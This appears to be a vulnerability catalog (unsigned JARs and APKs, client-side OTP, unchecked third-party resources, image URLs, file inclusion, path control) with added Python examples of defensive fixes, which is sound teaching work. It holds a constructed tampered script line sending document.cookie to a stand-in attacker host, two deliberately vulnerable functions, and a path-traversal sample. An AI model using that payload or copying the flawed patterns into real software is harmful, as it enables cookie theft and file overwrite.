Data Manipulation
Insufficient data authenticity validation - JAR signing
Description The JAR files that compose the application are not correctly signed, allowing an attacker to modify the code without raising alerts on an integrity check. Impact Inject malicious code into the application without raising alerts. ...
Insecurely generated token - OTP
Description The OTP is generated client-side and sent to the server, so an attacker only needs to intercept the request to obtain the token and continue the application flow without access to the phone number used. Impact Make requests ...
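Added example, not part of the original catalog entry: the vulnerable pattern above next to a server-side OTP flow. Everything here is constructed for illustration (the in-memory OTP_STORE, the 300-second lifetime, the five-attempt limit and the phone numbers); the point is that the code is created and stored on the server, delivered out of band, checked in constant time, expires, is single-use and is rate-limited, so intercepting the client's request yields nothing.

```python
import hmac
import secrets
import time

# Constructed in-memory store for the example; a real service would keep the
# same fields (code, expiry, attempt counter) in a database or cache.
OTP_STORE = {}
OTP_TTL_SECONDS = 300
MAX_ATTEMPTS = 5


def issue_otp(phone, now=None):
    """Server-side generation: the server creates the code, stores it, and hands
    it to the SMS gateway. The HTTP response to the client carries no code."""
    now = time.time() if now is None else now
    code = f"{secrets.randbelow(10**6):06d}"  # 6 digits, CSPRNG-backed
    OTP_STORE[phone] = {"code": code, "expires": now + OTP_TTL_SECONDS, "attempts": 0}
    return code  # returned here only so a caller can simulate the SMS channel


def verify_otp(phone, submitted, now=None):
    """Check a submitted code: bounded lifetime, bounded attempts, single use,
    constant-time comparison."""
    now = time.time() if now is None else now
    entry = OTP_STORE.get(phone)
    if entry is None:
        return False
    if now > entry["expires"]:
        del OTP_STORE[phone]
        return False
    entry["attempts"] += 1
    if entry["attempts"] > MAX_ATTEMPTS:
        del OTP_STORE[phone]  # lock out brute force of the 10^6 code space
        return False
    ok = hmac.compare_digest(entry["code"], str(submitted))
    if ok:
        del OTP_STORE[phone]  # a code is consumed on first successful use
    return ok


def vulnerable_issue_otp(phone, client_supplied_code, now=None):
    """The pattern from the description: the client generates the code and
    posts it together with the phone number. Anyone who sees that request
    (a proxy, a logging layer, the user themselves) knows the code and can
    pass verify_otp() without ever receiving the SMS."""
    now = time.time() if now is None else now
    OTP_STORE[phone] = {"code": str(client_supplied_code),
                        "expires": now + OTP_TTL_SECONDS, "attempts": 0}
```

The `now` parameter exists only to make expiry testable without sleeping; production code leaves it at the default.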
Insufficient data authenticity validation - Device Binding
Description Insecure device pairing results in insecure communication between two physical devices. The configured device-pairing protocols are vulnerable to misbinding attacks, which arise from the lack of verifiable identifiers. Impact - Spoof, ...
Insufficient data authenticity validation - Checksum verification
Description The application does not properly validate the integrity of resources loaded from external servers. Impact Use of third-party resources without verifying that their integrity has not been compromised. Recommendation Validate the integrity of ...
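Added example, not part of the original catalog entry: computing and checking the integrity pin for a third-party resource, using the Subresource Integrity format (`sha384-<base64>`) that browsers enforce through the `integrity=` attribute, plus the same check done server-side before an externally fetched file is used. The widget script, its tampered copy, the CDN URL and the injected `fetcher` callback are all constructed for the example.

```python
import base64
import binascii
import hashlib
import hmac

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


class IntegrityError(RuntimeError):
    pass


def sri_hash(data, algorithm="sha384"):
    """Subresource Integrity value for a resource body: '<alg>-<base64 digest>'.
    This is the string that goes in the integrity= attribute."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError("SRI supports only sha256, sha384 and sha512")
    digest = hashlib.new(algorithm, data).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode()}"


def verify_integrity(data, expected):
    """Return True iff data hashes to the pinned 'alg-base64' value.
    Unknown algorithms and malformed pins fail closed."""
    algorithm, _, b64 = expected.partition("-")
    if algorithm not in SRI_ALGORITHMS:
        return False
    try:
        expected_digest = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return False
    actual = hashlib.new(algorithm, data).digest()
    return hmac.compare_digest(actual, expected_digest)


def fetch_and_verify(url, expected, fetcher):
    """Server-side equivalent of the browser's SRI check. fetcher(url) -> bytes
    is injected so the example runs offline; production code would use an
    HTTP client there. Content that fails the pin is never returned."""
    data = fetcher(url)
    if not verify_integrity(data, expected):
        raise IntegrityError(f"integrity check failed for {url}")
    return data


def script_tag(src, data):
    """The <script> tag a page should emit for a third-party resource."""
    return (f'<script src="{src}" integrity="{sri_hash(data)}" '
            'crossorigin="anonymous"></script>')


# Constructed sample: the vendor's widget and a tampered copy served from a
# compromised CDN.
WIDGET_JS = b"window.widget = function () { return 'ok'; };\n"
TAMPERED_JS = WIDGET_JS + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"
```

The pin must be computed from the exact bytes the vendor ships and stored with the page, never fetched from the same server as the resource; a resource that changes legitimately needs a new pin, which is the intended friction.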
Insufficient data authenticity validation - Images
Description The system does not validate that profile image URLs point to a valid image, allowing partial paths or URLs to be stored that can be used to craft more complex attack vectors such as controlled redirects or CSRF. Impact Manipulate the ...
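Added example, not part of the original catalog entry: a validator for a stored profile image URL that rejects the inputs the description warns about (relative and scheme-relative paths, non-https schemes, userinfo tricks such as `https://cdn.example.com@evil.example/`, and paths that are redirect endpoints rather than image files), followed by a magic-byte check on the fetched bytes. The allowed-host set, the extension list and the signature table are assumptions for the example.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}
IMAGE_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif", ".webp")
# Magic bytes for the accepted formats (constructed table for the example).
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def validate_image_url(url, allowed_hosts):
    """Accept only absolute https URLs to an allow-listed host whose path names
    an image file. Relative paths, schemes such as javascript: or data:, userinfo
    tricks (https://good@evil/) and redirect endpoints are all rejected."""
    if not isinstance(url, str) or len(url) > 2048:
        return False
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False  # also rejects '/avatars/x.png', '//evil/x.png', 'javascript:'
    if parts.username is not None or parts.password is not None:
        return False
    try:
        if parts.port not in (None, 443):
            return False
    except ValueError:  # non-numeric port
        return False
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return False
    if not parts.path.lower().endswith(IMAGE_EXTENSIONS):
        return False
    return True


def looks_like_image(data):
    """Second check after fetching: the bytes must start like an image, not HTML."""
    if data[:4] == b"RIFF" and data[8:12] == b"WEBP":
        return "webp"
    for signature, kind in IMAGE_SIGNATURES.items():
        if data.startswith(signature):
            return kind
    return None
```

The extension check is a syntactic filter only; the content check is what actually establishes that the URL leads to an image, and a server that fetches the URL itself should also refuse to follow redirects off the allowed hosts.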
Insufficient data authenticity validation
Description The application does not verify on the server whether the user has permission to modify certain fields, and it accepts invalid data in some fields, for example non-existent names. Impact Inject potentially malicious characters into ...
Local file inclusion
Description The application allows an attacker to read or execute files located on the server by manipulating relative paths in the input fields. Impact - View the contents of sensitive files stored on the server. - Obtain sensitive data. - Read system ...
Out-of-bounds read
Description It is possible to make the system read data before or beyond the intended buffer. Impact Gain access to the system and take control of the server. Recommendation - Implement good security practices in the software development life cycle. - ...
Insufficient data authenticity validation - APK signing
Description The APK is not digitally signed. Impact Trick users into installing an APK that does not come from the original author. Recommendation Digitally sign the APK. Threat Non-authenticated attacker from the Internet. Expected Remediation Time ...
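Added example, not part of the original catalog entries, covering both the JAR signing entry above and this APK signing entry (an APK's v1 signature is the same META-INF scheme; newer APKs add the v2/v3 signing block that `apksigner verify` checks). It builds a constructed archive, writes the manifest digests that a signer would, and then checks an archive for two things an assessor looks at: whether signature files (`.SF` plus `.RSA`/`.DSA`/`.EC`) are present at all, and whether every content entry still matches its manifest digest after repackaging. The sample entries, the `APP.SF`/`APP.RSA` placeholders and the SHA-256-only manifest handling are assumptions of the example; it deliberately does not verify the signature blocks themselves, which is what `jarsigner -verify -verbose -certs app.jar` and `apksigner verify` do.

```python
import base64
import hashlib
import hmac
import io
import zipfile

SIGNATURE_BLOCK_SUFFIXES = (".RSA", ".DSA", ".EC")

# Constructed sample archive contents (not a real application).
SAMPLE_ENTRIES = {
    "com/example/App.class": b"\xca\xfe\xba\xbe example class bytes",
    "res/config.properties": b"mode=prod\n",
}


def digest_b64(data):
    return base64.b64encode(hashlib.sha256(data).digest()).decode()


def build_manifest(entries):
    """MANIFEST.MF with a SHA-256-Digest per entry, the form jarsigner writes
    (this example handles SHA-256 digests only)."""
    lines = ["Manifest-Version: 1.0", "Created-By: example", ""]
    for name, data in entries.items():
        lines += [f"Name: {name}", f"SHA-256-Digest: {digest_b64(data)}", ""]
    return ("\r\n".join(lines) + "\r\n").encode()


def build_jar(entries, signed=False):
    """Constructed JAR. signed=True adds placeholder .SF/.RSA files so the
    presence check has something to find; they are not valid signatures."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", build_manifest(entries))
        if signed:
            zf.writestr("META-INF/APP.SF", b"Signature-Version: 1.0\r\n")
            zf.writestr("META-INF/APP.RSA", b"\x30\x00")  # placeholder bytes
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def parse_manifest_digests(manifest_bytes):
    """Map entry name -> SHA-256-Digest, unwrapping 72-byte continuation lines."""
    lines = []
    for raw in manifest_bytes.decode("utf-8").splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    digests, name = {}, None
    for line in lines:
        if line.startswith("Name: "):
            name = line[len("Name: "):]
        elif line.startswith("SHA-256-Digest: ") and name:
            digests[name] = line[len("SHA-256-Digest: "):]
        elif line == "":
            name = None
    return digests


def check_jar(jar_bytes):
    """Report whether signature files are present and which content entries
    have no manifest digest or a digest that no longer matches."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        meta = [n for n in names if n.startswith("META-INF/")]
        has_sf = any(n.upper().endswith(".SF") for n in meta)
        has_block = any(n.upper().endswith(SIGNATURE_BLOCK_SUFFIXES) for n in meta)
        content = [n for n in names if n not in meta and not n.endswith("/")]
        if "META-INF/MANIFEST.MF" not in names:
            return {"signed": False, "bad_entries": sorted(content)}
        digests = parse_manifest_digests(zf.read("META-INF/MANIFEST.MF"))
        bad = [n for n in content
               if n not in digests
               or not hmac.compare_digest(digests[n], digest_b64(zf.read(n)))]
    return {"signed": has_sf and has_block, "bad_entries": sorted(bad)}


def tamper(jar_bytes, name, new_data):
    """Replace or add one entry without touching META-INF, as an attacker
    repackaging the archive would."""
    src = zipfile.ZipFile(io.BytesIO(jar_bytes))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != name:
                dst.writestr(info.filename, src.read(info.filename))
        dst.writestr(name, new_data)
    return out.getvalue()
```

An archive that passes this check can still be unsigned or re-signed with an attacker's key, since the manifest and `.SF` can be regenerated; the presence check only tells you the integrity chain exists, and the certificate behind the signature block is what binds it to the original author.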
External control of file name or path
Description It is possible to modify the path to which an uploaded file will be saved. Impact - Save files in paths other than those expected by the application. - Overwrite important files within the system by referring to the path where the upload ...
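Added example, not part of the original catalog entries, covering both the local file inclusion entry above and this file name/path entry: a single containment check that resolves a client-supplied path under a fixed base directory and refuses anything that ends up outside it, used once for reads (include/template names) and once for upload destinations, where the stored name is generated server-side and only an allow-listed extension is kept from the client's name. The base directories, the extension list and the vulnerable join shown for contrast are assumptions of the example.

```python
import secrets
from pathlib import Path

ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".pdf"}


class UnsafePath(ValueError):
    """Raised when a client-supplied path would leave the permitted directory."""


def safe_join(base, user_path):
    """Resolve user_path under base and refuse anything that escapes it.
    resolve() collapses '..' and follows symlinks, and joining an absolute
    user_path discards base entirely, so the containment check after
    resolve() is the one that matters."""
    if "\x00" in user_path:
        raise UnsafePath("NUL byte in path")
    base_dir = Path(base).resolve()
    candidate = (base_dir / user_path).resolve()
    try:
        candidate.relative_to(base_dir)
    except ValueError:
        raise UnsafePath(f"{user_path!r} escapes {base_dir}") from None
    return candidate


def is_path_safe(base, user_path):
    try:
        safe_join(base, user_path)
        return True
    except UnsafePath:
        return False


def read_file_under(base, user_path, encoding="utf-8"):
    """Inclusion-safe read: the include or template name taken from the request
    can only ever name a file below base."""
    return safe_join(base, user_path).read_text(encoding=encoding)


def is_allowed_upload(client_filename):
    return Path(client_filename).suffix.lower() in ALLOWED_UPLOAD_EXT


def upload_destination(upload_dir, client_filename):
    """Never derive the stored path from the client's file name: keep only an
    allow-listed extension and generate the name server-side."""
    if not is_allowed_upload(client_filename):
        raise UnsafePath(f"extension not allowed: {client_filename!r}")
    server_name = secrets.token_hex(16) + Path(client_filename).suffix.lower()
    return safe_join(upload_dir, server_name)


def vulnerable_upload_destination(upload_dir, client_filename):
    """The flaw from the description: the client-controlled name is joined to
    the upload directory as-is, so '../../etc/cron.d/job.png' lands outside it."""
    return Path(upload_dir) / client_filename
```

The check is done on the resolved path rather than on the raw string so that encodings, `..` segments and symlinks inside the base directory are all handled by the same comparison; rejecting the string `..` alone misses symlinked escapes and is easy to bypass.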